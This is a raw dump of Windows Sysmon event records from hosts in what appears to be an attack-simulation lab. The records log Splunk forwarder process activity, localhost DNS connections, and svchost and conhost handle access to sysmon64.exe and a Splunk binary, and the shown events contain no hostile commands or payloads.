Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000043972Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.109{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3CBBFD050AC153ABC6FFC0242558EF6,SHA256=2CCCB81745BC04A59AAA0C1D422EC17EC9A0A16E62C90F9BD3890C12392D68B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.180{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53186- 354300x8000000000000000205138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.180{00000000-0000-0000-0000-000000000000}5912<unknown process>-udptruefalse127.0.0.1-53186-false127.0.0.1-53domain 354300x8000000000000000205137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.180{00000000-0000-0000-0000-000000000000}5912<unknown process>-udpfalsefalse127.0.0.1-53185-false127.0.0.1-53domain 354300x8000000000000000205136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.180{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53185- 354300x8000000000000000205135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.180{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53185- 354300x8000000000000000205134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.180{00000000-0000-0000-0000-000000000000}5912<unknown process>-udptruefalse127.0.0.1-53185-false127.0.0.1-53domain 354300x8000000000000000205133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.179{00000000-0000-0000-0000-000000000000}5912<unknown process>-udpfalsefalse127.0.0.1-53184-false127.0.0.1-53domain 354300x8000000000000000205132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.179{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53184- 354300x8000000000000000205131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.179{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53184- 354300x8000000000000000205130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.179{00000000-0000-0000-0000-000000000000}5912<unknown process>-udptruefalse127.0.0.1-53184-false127.0.0.1-53domain 354300x8000000000000000205129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.102{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53183- 354300x8000000000000000205128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.102{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53183- 354300x8000000000000000205127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.102{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53182- 354300x8000000000000000205126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.102{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53182- 354300x8000000000000000205125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.101{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53181- 354300x8000000000000000205124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.101{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53181- 354300x8000000000000000205123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.018{00000000-0000-0000-0000-000000000000}5364<unknown process>-udpfalsefalse127.0.0.1-53180-false127.0.0.1-53domain 354300x8000000000000000205122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.018{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53180- 354300x8000000000000000205121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.017{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53180- 354300x8000000000000000205120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.017{00000000-0000-0000-0000-000000000000}5364<unknown process>-udptruefalse127.0.0.1-53180-false127.0.0.1-53domain 354300x8000000000000000205119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.017{00000000-0000-0000-0000-000000000000}5364<unknown process>-udpfalsefalse127.0.0.1-53179-false127.0.0.1-53domain 354300x8000000000000000205118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.017{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53179- 354300x8000000000000000205117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.017{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53179- 354300x8000000000000000205116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.017{00000000-0000-0000-0000-000000000000}5364<unknown process>-udptruefalse127.0.0.1-53179-false127.0.0.1-53domain 354300x8000000000000000205115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.017{00000000-0000-0000-0000-000000000000}5364<unknown process>-udpfalsefalse127.0.0.1-53178-false127.0.0.1-53domain 354300x8000000000000000205114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.017{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53178- 354300x8000000000000000205113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.017{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53178- 354300x8000000000000000205112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.017{00000000-0000-0000-0000-000000000000}5364<unknown process>-udptruefalse127.0.0.1-53178-false127.0.0.1-53domain 354300x8000000000000000205111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.929{00000000-0000-0000-0000-000000000000}5752<unknown process>-udpfalsefalse127.0.0.1-53177-false127.0.0.1-53domain 354300x8000000000000000205110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.929{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53177- 354300x8000000000000000205109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.929{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53177- 354300x8000000000000000205108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.929{00000000-0000-0000-0000-000000000000}5752<unknown process>-udptruefalse127.0.0.1-53177-false127.0.0.1-53domain 354300x8000000000000000205107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.929{00000000-0000-0000-0000-000000000000}5752<unknown process>-udpfalsefalse127.0.0.1-53176-false127.0.0.1-53domain 354300x8000000000000000205106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.929{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53176- 354300x8000000000000000205105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.928{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53176- 354300x8000000000000000205104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.928{00000000-0000-0000-0000-000000000000}5752<unknown process>-udptruefalse127.0.0.1-53176-false127.0.0.1-53domain 354300x8000000000000000205103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.830{00000000-0000-0000-0000-000000000000}7328<unknown process>-udpfalsefalse127.0.0.1-53174-false127.0.0.1-53domain 354300x8000000000000000205102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.830{00000000-0000-0000-0000-000000000000}7328<unknown process>-udptruefalse127.0.0.1-53174-false127.0.0.1-53domain 354300x8000000000000000205101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.830{00000000-0000-0000-0000-000000000000}7328<unknown process>-udpfalsefalse127.0.0.1-53173-false127.0.0.1-53domain 354300x8000000000000000205100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.830{00000000-0000-0000-0000-000000000000}7328<unknown process>-udptruefalse127.0.0.1-53173-false127.0.0.1-53domain 354300x8000000000000000205099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.830{00000000-0000-0000-0000-000000000000}7328<unknown process>-udpfalsefalse127.0.0.1-53172-false127.0.0.1-53domain 354300x8000000000000000205098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.737{00000000-0000-0000-0000-000000000000}2256<unknown process>-udptruefalse127.0.0.1-53171-false127.0.0.1-53domain 354300x8000000000000000205097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.737{00000000-0000-0000-0000-000000000000}2256<unknown process>-udpfalsefalse127.0.0.1-53170-false127.0.0.1-53domain 354300x8000000000000000205096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.736{00000000-0000-0000-0000-000000000000}2256<unknown process>-udpfalsefalse127.0.0.1-53169-false127.0.0.1-53domain 354300x8000000000000000205095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.736{00000000-0000-0000-0000-000000000000}2256<unknown process>-udptruefalse127.0.0.1-53169-false127.0.0.1-53domain 354300x8000000000000000205094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.633{00000000-0000-0000-0000-000000000000}5960<unknown process>-udpfalsefalse127.0.0.1-53168-false127.0.0.1-53domain 354300x8000000000000000205093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.632{00000000-0000-0000-0000-000000000000}5960<unknown process>-udptruefalse127.0.0.1-53168-false127.0.0.1-53domain 354300x8000000000000000205092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.632{00000000-0000-0000-0000-000000000000}5960<unknown process>-udpfalsefalse127.0.0.1-53167-false127.0.0.1-53domain 354300x8000000000000000205091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.632{00000000-0000-0000-0000-000000000000}5960<unknown process>-udptruefalse127.0.0.1-53167-false127.0.0.1-53domain 354300x8000000000000000205090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.632{00000000-0000-0000-0000-000000000000}5960<unknown process>-udpfalsefalse127.0.0.1-53166-false127.0.0.1-53domain 354300x8000000000000000205089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.632{00000000-0000-0000-0000-000000000000}5960<unknown process>-udptruefalse127.0.0.1-53166-false127.0.0.1-53domain 354300x8000000000000000205088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.556{00000000-0000-0000-0000-000000000000}5516<unknown process>-udpfalsefalse127.0.0.1-53165-false127.0.0.1-53domain 354300x8000000000000000205087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.556{00000000-0000-0000-0000-000000000000}5516<unknown process>-udptruefalse127.0.0.1-53165-false127.0.0.1-53domain 354300x8000000000000000205086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.556{00000000-0000-0000-0000-000000000000}5516<unknown process>-udpfalsefalse127.0.0.1-53164-false127.0.0.1-53domain 354300x8000000000000000205085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.556{00000000-0000-0000-0000-000000000000}5516<unknown process>-udptruefalse127.0.0.1-53164-false127.0.0.1-53domain 354300x8000000000000000205084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.555{00000000-0000-0000-0000-000000000000}5516<unknown process>-udpfalsefalse127.0.0.1-53163-false127.0.0.1-53domain 354300x8000000000000000205083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.555{00000000-0000-0000-0000-000000000000}5516<unknown process>-udptruefalse127.0.0.1-53163-false127.0.0.1-53domain 23542300x8000000000000000205082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:49.310{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2B3E2418C709A1D5246A9B502F115E5F,SHA256=3729F0EA55A6590AF73E030D8FF9F85456781505B85EA3C96AA7E37EF2D86922,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044001Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.250{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65453DB74A82B329FABF8851CD081AB7,SHA256=0D58361A2DD156946D148012B8499DACF725A2914C9D7B8C1E4D314B0E77EFA7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044000Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.031{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-17D1-629A-0F07-000000006002}2976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043999Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.031{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043998Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.031{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043997Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.031{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043996Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.031{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043995Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.031{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043994Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.031{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043993Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.031{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043992Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.031{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043991Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.031{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 